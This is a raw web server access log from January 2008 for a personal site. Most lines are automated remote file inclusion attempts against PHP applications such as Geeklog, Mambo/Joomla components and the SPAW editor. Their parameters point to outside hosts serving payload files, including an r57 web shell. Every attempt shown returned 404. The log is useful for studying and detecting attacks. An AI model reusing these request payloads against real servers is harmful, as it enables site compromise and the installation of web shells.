62.105.78.214 - - [18/Jan/2008:14:11:54 -0800] "GET //geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.168.186 - - [18/Jan/2008:14:11:55 -0800] "GET /logs//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.89.232.80 - - [18/Jan/2008:14:11:59 -0800] "GET /logs/access_080101.log//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.89.232.80 - - [18/Jan/2008:14:12:00 -0800] "GET //geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.89.232.80 - - [18/Jan/2008:14:12:00 -0800] "GET /logs//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.148.173.160 - - [18/Jan/2008:14:12:04 -0800] "GET /logs/access_080101.log//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.148.173.160 - - [18/Jan/2008:14:12:05 -0800] "GET //geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.148.173.160 - - [18/Jan/2008:14:12:05 -0800] "GET /logs//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.164.1.13 - - [18/Jan/2008:14:12:58 -0800] "GET /logs/access_080101.log//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
63.164.1.13 - - [18/Jan/2008:14:12:58 -0800] "GET //geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
63.164.1.13 - - [18/Jan/2008:14:12:58 -0800] "GET /logs//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
168.243.203.247 - - [18/Jan/2008:14:13:16 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.135.39.110 - - [18/Jan/2008:14:13:40 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
66.135.39.110 - - [18/Jan/2008:14:13:40 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
64.92.167.50 - - [18/Jan/2008:14:14:27 -0800] "GET /logs/access_080101.log//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.92.167.50 - - [18/Jan/2008:14:14:28 -0800] "GET //geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.92.167.50 - - [18/Jan/2008:14:14:28 -0800] "GET /logs//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.48.78.205 - - [18/Jan/2008:14:14:31 -0800] "GET //geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.48.78.205 - - [18/Jan/2008:14:14:32 -0800] "GET /logs//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.105.232.59 - - [18/Jan/2008:14:15:22 -0800] "GET /logs/access_071228.log//spaw/dialogs/table.php?spaw_root=http://www.catim.com/legislacao/.bht/r57.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.105.232.59 - - [18/Jan/2008:14:15:23 -0800] "GET //spaw/dialogs/table.php?spaw_root=http://www.catim.com/legislacao/.bht/r57.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.105.232.59 - - [18/Jan/2008:14:15:23 -0800] "GET /logs//spaw/dialogs/table.php?spaw_root=http://www.catim.com/legislacao/.bht/r57.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.230.3.98 - - [18/Jan/2008:14:15:34 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
163.17.190.135 - - [18/Jan/2008:14:15:45 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
163.17.190.135 - - [18/Jan/2008:14:15:45 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
206.225.82.176 - - [18/Jan/2008:14:16:05 -0800] "GET /logs/access_080101.log//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.225.82.176 - - [18/Jan/2008:14:16:05 -0800] "GET //geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.225.82.176 - - [18/Jan/2008:14:16:05 -0800] "GET /logs//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.158.86 - - [18/Jan/2008:14:16:12 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [18/Jan/2008:14:16:17 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [18/Jan/2008:14:16:17 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.18.66 - - [18/Jan/2008:14:16:26 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.rodrigosigal.com/visionessonoras2006/usr/downloads/common/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [18/Jan/2008:14:16:26 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.rodrigosigal.com/visionessonoras2006/usr/downloads/common/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.114.132.12 - - [18/Jan/2008:14:17:46 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.31.2 - - [18/Jan/2008:14:17:51 -0800] "GET /logs/access_080101.log//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.31.2 - - [18/Jan/2008:14:17:51 -0800] "GET //geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.31.2 - - [18/Jan/2008:14:17:52 -0800] "GET /logs//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.203.9.58 - - [18/Jan/2008:14:17:57 -0800] "GET /logs/access_080101.log//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.203.9.58 - - [18/Jan/2008:14:17:57 -0800] "GET //geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.203.9.58 - - [18/Jan/2008:14:17:57 -0800] "GET /logs//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.7.125 - - [18/Jan/2008:14:17:58 -0800] "GET /bikes/dteel/10MAR07/?N=D HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.80.123.56 - - [18/Jan/2008:14:18:06 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://magnifico.helloweb.eu/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [18/Jan/2008:14:18:07 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://magnifico.helloweb.eu/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [18/Jan/2008:14:18:07 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://magnifico.helloweb.eu/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.8.212.2 - - [18/Jan/2008:14:18:23 -0800] "GET /logs/access_080101.log//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.8.212.2 - - [18/Jan/2008:14:18:23 -0800] "GET /logs/access_080101.log//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.8.212.2 - - [18/Jan/2008:14:18:24 -0800] "GET //geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.8.212.2 - - [18/Jan/2008:14:18:24 -0800] "GET //geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.8.212.2 - - [18/Jan/2008:14:18:24 -0800] "GET /logs//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.8.212.2 - - [18/Jan/2008:14:18:24 -0800] "GET /logs//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.74.241.22 - - [18/Jan/2008:14:18:59 -0800] "GET /logs/access_080101.log//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.241.22 - - [18/Jan/2008:14:19:00 -0800] "GET //geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.74.241.22 - - [18/Jan/2008:14:19:00 -0800] "GET /logs//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.203.211 - - [18/Jan/2008:14:19:18 -0800] "GET /logs/access_071228.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [18/Jan/2008:14:19:19 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [18/Jan/2008:14:19:21 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.3.98 - - [18/Jan/2008:14:19:26 -0800] "GET /logs/access_071230.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.3.98 - - [18/Jan/2008:14:19:28 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://wespenval.nl/bestel/images/canboy1? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
86.109.98.97 - - [18/Jan/2008:14:19:34 -0800] "GET /logs/access_071225.log//templates/mangobery/footer.sample.php?Site_Path=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.98.97 - - [18/Jan/2008:14:19:35 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.98.97 - - [18/Jan/2008:14:19:35 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://uniquantum.co.kr/.../www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.93.56.183 - - [18/Jan/2008:14:19:53 -0800] "GET /logs/access_071230.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.183 - - [18/Jan/2008:14:19:54 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.183 - - [18/Jan/2008:14:19:55 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.90 - - [18/Jan/2008:14:20:44 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.128.223 - - [18/Jan/2008:14:21:41 -0800] "GET /logs/access.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.crewfuck.kit.net/eval/safealba.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.13.128.223 - - [18/Jan/2008:14:21:41 -0800] "GET /logs/access.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.crewfuck.kit.net/eval/safealba.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.13.128.223 - - [18/Jan/2008:14:21:42 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.crewfuck.kit.net/eval/safealba.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.13.128.223 - - [18/Jan/2008:14:21:42 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.crewfuck.kit.net/eval/safealba.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.13.128.223 - - [18/Jan/2008:14:21:42 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.crewfuck.kit.net/eval/safealba.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.13.128.223 - - [18/Jan/2008:14:21:42 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.crewfuck.kit.net/eval/safealba.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.200.229.140 - - [18/Jan/2008:14:21:50 -0800] "GET /logs/access.log//modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://www.crewfuck.kit.net/eval/safealba.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.229.140 - - [18/Jan/2008:14:21:50 -0800] "GET //modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://www.crewfuck.kit.net/eval/safealba.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.229.140 - - [18/Jan/2008:14:21:50 -0800] "GET /logs//modules/newbb_plus/class/class.forumposts.php?bbPath[path]=http://www.crewfuck.kit.net/eval/safealba.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.128.223 - - [18/Jan/2008:14:22:02 -0800] "GET /logs/access_071228.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.crewfuck.kit.net/eval/safealba.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.13.128.223 - - [18/Jan/2008:14:22:02 -0800] "GET /logs/access_071228.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.crewfuck.kit.net/eval/safealba.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.158.154 - - [18/Jan/2008:14:23:10 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://proscripting.altervista.org/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.126.106 - - [18/Jan/2008:14:23:24 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.126.106 - - [18/Jan/2008:14:23:24 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.179.208 - - [18/Jan/2008:14:23:31 -0800] "GET /funny/?D=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.38.90 - - [18/Jan/2008:14:24:08 -0800] "GET /logs/access.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.38.90 - - [18/Jan/2008:14:24:09 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.38.90 - - [18/Jan/2008:14:24:09 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.52.146 - - [18/Jan/2008:14:24:26 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.84.148.140 - - [18/Jan/2008:14:24:26 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.148.140 - - [18/Jan/2008:14:24:27 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.148.140 - - [18/Jan/2008:14:24:27 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.52.146 - - [18/Jan/2008:14:24:31 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.84.148.140 - - [18/Jan/2008:14:24:37 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ineal.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.38.90 - - [18/Jan/2008:14:24:37 -0800] "GET /logs/access_071228.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.52.146 - - [18/Jan/2008:14:24:39 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.76.111.11 - - [18/Jan/2008:14:24:42 -0800] "GET /logs/access_071229.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.boletinturistico.com:85/AdManagerPro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [18/Jan/2008:14:24:42 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.boletinturistico.com:85/AdManagerPro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [18/Jan/2008:14:24:42 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.boletinturistico.com:85/AdManagerPro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.34.161.42 - - [18/Jan/2008:14:25:04 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
64.34.161.42 - - [18/Jan/2008:14:25:04 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
209.85.52.146 - - [18/Jan/2008:14:25:19 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:25:48 -0800] "GET /logs/access.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:25:48 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:25:48 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.17.190.135 - - [18/Jan/2008:14:26:12 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
163.17.190.135 - - [18/Jan/2008:14:26:12 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
79.99.26.20 - - [18/Jan/2008:14:26:17 -0800] "GET /logs/access_071228.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.39.110 - - [18/Jan/2008:14:26:23 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
66.135.39.110 - - [18/Jan/2008:14:26:23 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
203.157.182.9 - - [18/Jan/2008:14:26:43 -0800] "GET /logs/access_071229.log//?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.132.12 - - [18/Jan/2008:14:27:01 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.132.12 - - [18/Jan/2008:14:27:01 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.132.12 - - [18/Jan/2008:14:27:02 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.67.82 - - [18/Jan/2008:14:27:04 -0800] "GET /logs/access_080101.log//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [18/Jan/2008:14:27:09 -0800] "GET //geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [18/Jan/2008:14:27:12 -0800] "GET /logs//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.114.132.12 - - [18/Jan/2008:14:27:17 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
